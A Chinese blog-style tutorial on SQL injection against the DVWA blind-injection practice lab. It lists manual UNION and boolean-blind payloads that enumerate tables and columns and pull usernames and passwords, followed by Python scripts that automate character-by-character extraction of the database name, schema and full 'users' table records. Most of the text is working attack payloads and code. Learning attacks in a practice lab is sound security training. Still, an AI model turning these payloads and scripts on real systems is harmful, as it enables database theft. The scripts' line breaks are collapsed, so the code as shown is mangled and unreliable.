本文主要是介绍[渗透]SQL注入之报错注入与盲注的基础操作(手工和脚本),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
概述
本文示例样本为DVWA-SQL Injection(Bind),难度easy,如图:
报错注入
1' order by 1-n
1' union select 1,2,..n #
1' union select user(), version(), database()
1' union select 1, group_concat(table_name) from information_schema.tables where table_schema = database() # 查表
1' union select 1, group_concat(column_name) from information_schema.columns where table_name = 'users' # 查字段
1' union select null, concat_ws(",",user,password) from users # 查数据库字段值
盲注
1' and length(database()) > 4 and '1' = '1 获取当前数据库的长度 >4 报错 >3不报错,说明长度是4
1' and ((select ascii(substr(database(),1,1)))>32) and '1'='1 获取当前数据库名字 ascii码的范围32-127
1' and (select count(table_name) from information_schema.tables where table_schema=database()) > 2 and '1' = '1 获取表的数量
1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) > 1 and '1'='1 获取第一张表的长度
1' and ascii(mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1)) >1 and '1'='1 获取第一张表名
1' and (select count(column_name) from information_schema.columns where table_name='users') > 2 and '1' = '1 获取users表字段的数量
1' and length((select column_name from information_schema.columns where table_name='users' limit 0,1)) > 1 and '1' = '1 获取user表每个字段的长度
1' and ascii(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)) > 1 and '1' ='1 获取users表字段值
1' and (select count(1) from users) > 1 and '1'='1 脱裤-获取users表记录数量
1' and length((select user_id from users limit 0,1))> 1 and '1' = '1 脱裤-获得每条记录的长度
1' and ascii(mid((select user_id from users limit 0,1),1,1)) > 1 and '1'='1 脱裤-获得每条记录的内容
脚本
-----盲注:猜库长度--------------------------------
import requests# guest database length
str1 = 'MISSING'
len = 0
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
for i in range(1,50):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and length(database()) > %s and '1' = '1&Submit=Submit"%ir = requests.get(url,headers=headers).textif str1 in r:len += ibreak
print(len)
-----盲注:猜库--------------------------------
import requests# guest database name
str1 = 'MISSING'
database = ''
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
for i in range(1,5):for j in range(32,128):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and ((select ascii(substr(database(),%s,1)))>%s) and '1'='1&Submit=Submit"%(i,j)r = requests.get(url,headers=headers).textif str1 in r:database += chr(j)print(chr(j))break
print(database)
-----盲注:猜表数量--------------------------------
import requests# guest database table name sum
str1 = 'MISSING'
len = 0
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
for i in range(1,50):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database()) > %s and '1' = '1&Submit=Submit"%ir = requests.get(url,headers=headers).textif str1 in r:len += ibreak
print(len)
-----盲注:猜表名--------------------------------
import requests# guest database table name len
# hint: table sum is 2
str1 = 'MISSING'
t_len = []
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
print('guest database table name len start...')
for i in range(0,2):for j in range(1, 50):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit %s,1)) > %s and '1'='1&Submit=Submit"%(i,j)r = requests.get(url,headers=headers).textif str1 in r:t_len.append(j)breakprint('guest database table name start...')
table_name = ''
for i in range(0,2):for j in range(1, t_len[i]+1):for x in range(32, 128):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(mid(((select table_name from information_schema.tables where table_schema=database() limit %s,1)),%s,1)) >%s and '1'='1&Submit=Submit"%(i,j,x)r = requests.get(url,headers=headers).text if str1 in r:table_name += chr(x)breakprint(table_name)table_name = ''
-----盲注:猜表字段--------------------------------
import requests# guest database table columns
# hint: table name: guestbook, users
# step 1 get table columns sum
# step 2 get length of each table column
# step 3 get name of each table column
str1 = 'MISSING'
table_name = 'users'
column_sum = 0
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}for j in range(1, 50):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and (select count(column_name) from information_schema.columns where table_name='%s') > %s and '1' = '1&Submit=Submit"%(table_name,j)r = requests.get(url,headers=headers).textif str1 in r:column_sum += jbreak
print('step 1 get table column sum:%s'%(column_sum))column_len = []
for i in range(0, column_sum):for j in range(1, 50):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and length((select column_name from information_schema.columns where table_name='%s' limit %s,1)) > %s and '1' = '1&Submit=Submit"%(table_name,i,j)r = requests.get(url,headers=headers).textif str1 in r:column_len.append(j)break
print('step 2 get length of each table column:')
for i in range(len(column_len)):print(column_len[i])print('step 3 get name of each table column:')
column_name = ''
column_name_list = []
for i in range(0, column_sum):for k in range(1, column_len[i]+1):for j in range(32, 128):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(mid((select column_name from information_schema.columns where table_name='%s' limit %s,1),%s,1)) > %s and '1' ='1&Submit=Submit"%(table_name,i,k,j)r = requests.get(url,headers=headers).text if str1 in r:column_name += chr(j)breakprint(column_name)column_name_list.append(column_name)column_name = ''
-----盲注:猜表内容--------------------------------
import requests# guest database table content
# hint: table name: users, columns:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
# step 1 get number of table records
# step 2 get length of each table records
# step 3 get records of each table
str1 = 'MISSING'
table_name = 'users'
records_sum = 0
column_name = ['user_id','first_name','last_name','user','password','avatar','last_login','failed_login']
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}for j in range(1, 500):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and (select count(1) from %s) > %s and '1'='1&Submit=Submit"%(table_name,j)r = requests.get(url,headers=headers).textif str1 in r:records_sum += jbreak
print('step 1 get number of table records:%s'%(records_sum))records = ''
for i in range(0, records_sum):print("record line : %s"%(i+1))for j in range(len(column_name)):print("%s:"%(column_name[j]))for k in range(0, 500):url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and length((select %s from %s limit %s,1))> %s and '1' = '1&Submit=Submit"%(column_name[j],table_name,i,k)r = requests.get(url,headers=headers).textif str1 in r:for l in range(1,k+1):for m in range(32, 128):url2 = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(mid((select %s from %s limit %s,1),%s,1)) > %s and '1'='1&Submit=Submit"%(column_name[j],table_name,i,l,m)r2 = requests.get(url2,headers=headers).textif str1 in r2:records += chr(m)breakprint(records)records = ''break
源码下载
https://download.csdn.net/download/alex_bean/11460326
这篇关于[渗透]SQL注入之报错注入与盲注的基础操作(手工和脚本)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
